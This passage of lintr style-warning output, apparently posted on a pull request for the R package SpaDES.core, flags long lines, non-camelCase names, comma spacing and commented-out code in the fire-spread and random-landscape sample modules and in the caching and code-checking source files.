\"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:21:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/fireSpread/fireSpread.R#L21) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Eliot\", \"J\", \"B\"), \"McIntire\", email = \"eliot.mcintire@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/fireSpread/fireSpread.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"persistprob\", \"numeric\", 0.00, 0, 1, \"probability of fire persisting in a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/fireSpread/fireSpread.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"spreadprob\", \"numeric\", 0.225, 0.05, 0.5, \"probability of fire spreading into a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/fireSpread/fireSpread.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"startTime\", \"numeric\", start(sim) + 1, 0, end(sim), \"time of initial fire ignition\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/fireSpread/fireSpread.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), end(sim) + 1, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/fireSpread/fireSpread.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:42:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/fireSpread/fireSpread.R#L42) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:59:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/fireSpread/fireSpread.R#L59) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.fireSpread <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:87:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/fireSpread/fireSpread.R#L87) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim), \"fireSpread\", \"stats\") # do stats immediately following burn\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:142:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/fireSpread/fireSpread.R#L142) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:146:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/fireSpread/fireSpread.R#L146) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- raster(extent(landscapes), ncol = ncol(landscapes),\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:150:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/fireSpread/fireSpread.R#L150) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- setValues(Fires, 0)\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:153:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/fireSpread/fireSpread.R#L153) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:159:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/fireSpread/fireSpread.R#L159) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Burn <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:162:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/fireSpread/fireSpread.R#L162) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- spread(landscapes[[1]],\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:174:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/fireSpread/fireSpread.R#L174) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:181:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/fireSpread/fireSpread.R#L181) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Stats <- function(sim) {\n^~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/randomLandscapes/randomLandscapes.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:33:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/randomLandscapes/randomLandscapes.R#L33) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"inRAM\", \"logical\", FALSE, TRUE, FALSE, \"should the raster be stored in memory?\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:34:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/randomLandscapes/randomLandscapes.R#L34) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"nx\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the x dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/randomLandscapes/randomLandscapes.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"ny\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the y dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/randomLandscapes/randomLandscapes.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), NA, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/randomLandscapes/randomLandscapes.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between plot events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/randomLandscapes/randomLandscapes.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:40:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/randomLandscapes/randomLandscapes.R#L40) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/randomLandscapes/randomLandscapes.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".useCache\", \"logical\", FALSE, c(\"init\", \"plot\"), NA, \"should the module result be cached for future use\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:55:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/randomLandscapes/randomLandscapes.R#L55) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.randomLandscapes <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:75:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/randomLandscapes/randomLandscapes.R#L75) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"randomLandscapes\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/randomLandscapes/randomLandscapes.R#L86) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:100:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/randomLandscapes/randomLandscapes.R#L100) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DEM <- gaussMap(template, scale = 300, var = 0.03, speedup = speedup, inMemory = inMemory)\n    ^~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:17:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first plot event should occur\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:18:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L18) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first save event should occur\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:231:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/cache.R#L231) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$moduleName, \"module\\n\"))\n                                                 ^\n```\n[R/cache.R:242:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/cache.R#L242) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$eventType, \"event in\",\n                                                 ^\n```\n[R/cache.R:289:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/cache.R#L289) *style:* **Commented code should be removed.**\n```r\n​        #checkPath(cacheRepo, create = TRUE) #SpaDES dependency\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:413:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/cache.R#L413) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #   makes soft copy of all objects, i.e., they have the identical objects, which are pointers only\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:441:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/cache.R#L441) *style:* **Lines should not be more than 100 characters.**\n```r\n​        list2env(mget(lsObjectEnv[lsObjectEnv %in% createOutputs | lsObjectEnv %in% expectsInputs], envir = object@.envir), envir = object2@.envir)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:451:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/cache.R#L451) *style:* **Commented code should be removed.**\n```r\n​          #object2@events <- unique(rbindlist(list(object@events, object2@events)))\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:455:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/cache.R#L455) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # This is for objects that are not in the return environment yet because they are unrelated to the\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:468:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/cache.R#L468) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(atts in attrsToGrab) {\n         ^\n```\n[R/cache.R:472:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/cache.R#L472) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"tags\") <- attr(object, \"tags\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:473:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/cache.R#L473) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"call\") <- attr(object, \"call\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:474:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/cache.R#L474) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"function\") <- attr(object, \"function\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:507:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/cache.R#L507) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  setGeneric(\".addTagsToOutput\", function(object, outputObjects, FUN) {\n                                                                 ^~~\n```\n[R/cache.R:530:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/cache.R#L530) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(object, outputObjects, FUN, preDigestByClass) {\n                                               ^~~\n```\n[R/cache.R:622:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/cache.R#L622) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​objSize.simList <- function(x, quick = getOption(\"reproducible.quick\", FALSE)) {\n^~~~~~~~~~~~~~~\n```\n[R/cache.R:649:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/cache.R#L649) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​makeMemoiseable.simList <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:657:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/cache.R#L657) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​unmakeMemoiseable.simList_ <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/checkpoint.R:36:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/checkpoint.R#L36) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.checkpoint <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​                xAsCall <- .isLastLineSim(x = x, xAsString = bb[seq(funStarts[yy], funEnds[yy + 1])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:90:16:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L90) *style:* **Commented code should be removed.**\n```r\n​              #y = strsplit(bb[funStarts[yy]], split = \"\\\\s+\")[[1]][1]\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:91:53:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L91) *style:* **Commas should always have a space after.**\n```r\n​              y <- paste0(cantCodeCheckMessage, \"'\",bb[funStarts[yy]], \"'\")\n                                                    ^\n```\n[R/code-checking.R:144:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L144) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (identical(type, \"returnSim\")) { # This is intended for only the last line of a function\n                                      ^\n```\n[R/code-checking.R:182:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L182) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      } else if (identical(x[[1]], quote(`<-`)) ) {\n                                               ^\n```\n[R/code-checking.R:185:62:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L185) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​            if (any(grepl(x[[2]][[2]], pattern = \".envir\"))) {# i.e., sim@.envir\n                                                             ^\n```\n[R/code-checking.R:202:19:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L202) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x <- x[-(1:2)]\n                  ^\n```\n[R/code-checking.R:218:29:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L218) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x[[2]] <- x[[2]][-(1:2)]\n                            ^\n```\n[R/code-checking.R:286:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L286) *style:* **Lines should not be more than 100 characters.**\n```r\n​  allChecks <- list(simAssigns = simAssigns, simGets = simGets, returnsSim = returnsSim, assignToSim = assignToSim, fg = fg)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:319:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L319) *style:* **Lines should not be more than 100 characters.**\n```r\n​    allChecks[anyCantCodeCheck] <- lapply(names(cantCodeCheck[anyCantCodeCheck]), function(objName) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:368:51:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                  ^\n```\n[R/code-checking.R:368:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                       ^\n```\n[R/code-checking.R:384:20:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                   ^\n```\n[R/code-checking.R:384:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                        ^\n```\n[R/code-checking.R:395:90:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L395) *style:* **Commas should always have a space after.**\n```r\n​                                       paste0(paste(missingFrmMod, collapse = \", \"), \" \",verb,\n                                                                                         ^\n```\n[R/code-checking.R:440:75:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L440) *style:* **Commas should always have a space after.**\n```r\n​             \" but only for the 'get' functions, not the 'set' function \",\"\n                                                                          ^\n```\n[R/code-checking.R:454:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L454) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsNotInDotInputObjects[!(simAssignsNotInDotInputObjects %in% outputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:463:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:463:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L463) *style:* **Commas should always have a space 